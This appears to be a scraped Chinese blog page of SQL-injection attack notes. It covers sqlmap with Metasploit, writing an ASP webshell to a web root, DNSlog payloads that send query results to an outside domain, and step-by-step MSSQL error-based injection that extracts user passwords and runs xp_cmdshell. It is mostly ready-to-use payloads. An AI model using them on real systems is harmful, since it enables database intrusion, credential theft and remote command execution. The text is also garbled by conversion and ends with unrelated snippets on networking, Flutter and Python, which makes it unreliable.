sqlmap與
msf結合使用
sqlmap -u 目標
url -p name --dbms mysql --os-pwn --msf-path /usr/share/metasploit-framework
(metasploit
位置)sqlmap結合
bs的使用
step1:開啟
bp的日誌記錄功能,並儲存到桌面中
step2:開啟瀏覽器中**並設定
bp中**開關為「
intercept is off
」step3:
step4:開啟
sqlmap
測試,python sqlmap.py -i c:\user.....\log.txt -batch
-l 表示從檔案讀取
請求,測試完之後的結果生成乙個
.csv
格式的檔案
通過sqlmap 讀寫檔案
-–file-read=rfile
從後端的資料庫管理系統檔案系統讀取檔案
(物理路徑)
-–file-write=wfile
編輯後端的資料庫管理系統檔案系統上的本地檔案
(mssql xp_shell)-–
file-dest=dfile
後端的資料庫管理系統寫入檔案的絕對路徑
python sqlmap.py -u "" --file-read="g:\phpstudy\www\t1.txt"
python sqlmap.py -u "" --file-dest="g:\\phpstudy\\www\\result.txt" --file-write="c:\\test.txt"
c:\\test.txt <% eval request("cmd") %>
python sqlmap.py -u "target_url" --file-dest="/var/www/shell.php" --file-write="c:\\test.txt"
使用dvwa中的測試
dnslog
在盲注中的應用
step1:測試注入點,判斷列數
dnslog
提供的url
是否解析
注意**的響應時間,一般較長,表示可以解析
step3:使用
concat
拼接url
和sql
語句'\\\\',(select user()),'test.zy1ph7pdmh.......\\aaa')),2%23&submit=submit#
接下來只要將select user()更換
1』 and if((select load_file(concat(『\\\\』,(select database()),』.zy1ph7pdmh.......\\abc』)))1,0)
mssql手工注入
step1:尋找注入位置
step2:判斷資料庫型別
select *from sysobjects(
sysobjects
系統物件表,儲存當前資料庫的物件)
select*from users where id=1 and exits(select * from sysobjects)
and exits(select * from sysobjects)-- 有結果則說明後天資料是
mssql
還有其他方法:常用框架組合方法asp+mssql/頁面報錯資訊
step3:
select is_srvrolemember('sysadmin'); 判斷當前是否為
saselect is_srvrolemember('db_owner'); 判斷當前使用者寫檔案、讀檔案的許可權(
db_owner
)select is_srvrolemember('public');判斷是否有
public
許可權,可以爆破表
step4:
當前使用者:user and (user)=1--
資料庫版本:select db_name()
' and (select db_name())=1 --
' and (convert(int,db_name()))=1 --
當前資料庫:
select db_name(0) 當前資料庫,其中的引數表示第幾個資料庫
所有的資料庫:' and (convert(int,db_name(2)))=1-- //變換其中資料可以爆出所有的資料庫名稱(方法1)
select top 1 name from master..sysdatabases where name not in ('master','aspcms');(方法2)
select top 1 name from master..sysdatabases在系統資料庫中能夠查詢所有的資料庫
where name not in ('master','aspcms')表示查詢的結果不在括號中的集合裡
and (select top 1 name from master..sysdatabases)=1--
and (select top 10 name from master..sysdatabases)
step5:當前資料庫中表
select top 1 name from test.sys.all_objects where type=』u』 and is_ms_shipped=0 獲取第一表名
' and (select top 1 name from test.sys.all_objects where type=』u』 and is_ms_shipped=0)=1--
step6:獲取指定表的欄位名
select top 1 column_name from test.information_schema.columns where table_name=』users』
' and (select top 1 column_name from test.information_schema.columns where table_name=』users』)=1--
' and (select top 1 column_name from test.information_schema.columns where table_name=』users』 and column_name not in (『id』))=1-- //username出來了
' and (select top 1 column_name from test.information_schema.columns where table_name=』users』 and column_name not in (『id』,』username』))=1-- //password出來了
step7:獲取字段資料
select top 1 username from users
select top 1 password from users
' and (select top 1 password from users)=1--
解密資料,登入後台
mssql的
xp_cmdshell
擴充套件判斷當前mssql資料庫是否有
xp_cmdshell
擴充套件select count(*) from master. dbo.sysobjects where xtype ='x' and name = 'xp_cmdshell'
' and (select count(*) from master. dbo.sysobjects where xtype ='x' and name = 'xp_cmdshell'
)=1--返回
1 說明有;返回
0 說明沒有。
exec master..xp_cmdshell 『whoami』 執行xp_cmdshell外掛程式執行』whoami』
MGRE GRE PPP協議綜合運用
1.拿到拓撲圖,我們先看第乙個要求,r5是isp,isp是網路服務運營商,不能被通告進路由協議,所以在配置時,要寫一條靜態預設,指向isp 2.從拓撲圖我們可以看出,在實驗前需要先加2sa板卡,連線成串線 3.在完成前兩步後,開始進行配置,先配置直連路由,配置完成後,在配置各種要求 4.最後使用靜態...
Flutter form表單綜合運用
老規矩,看圖 一 效果圖 以下 複製進main.dart檔案即可執行 二 實現 import package flutter material.dart override widget build buildcontext context class formdemopage extends sta...
L6 11 綜合運用
本單元我們學習了模組知識,學習了常用的模組如 時間模組math,時間模組time和datetime,隨機模組random等,本節課我們將系統的去運用所學知識,完成一些 程式。猜拳又稱為划拳,在面對一些小事情,我們總是通過猜拳來決定。學習了模組後,我們可以模擬和電腦玩剪刀石頭布的遊戲。分析題目 玩家和...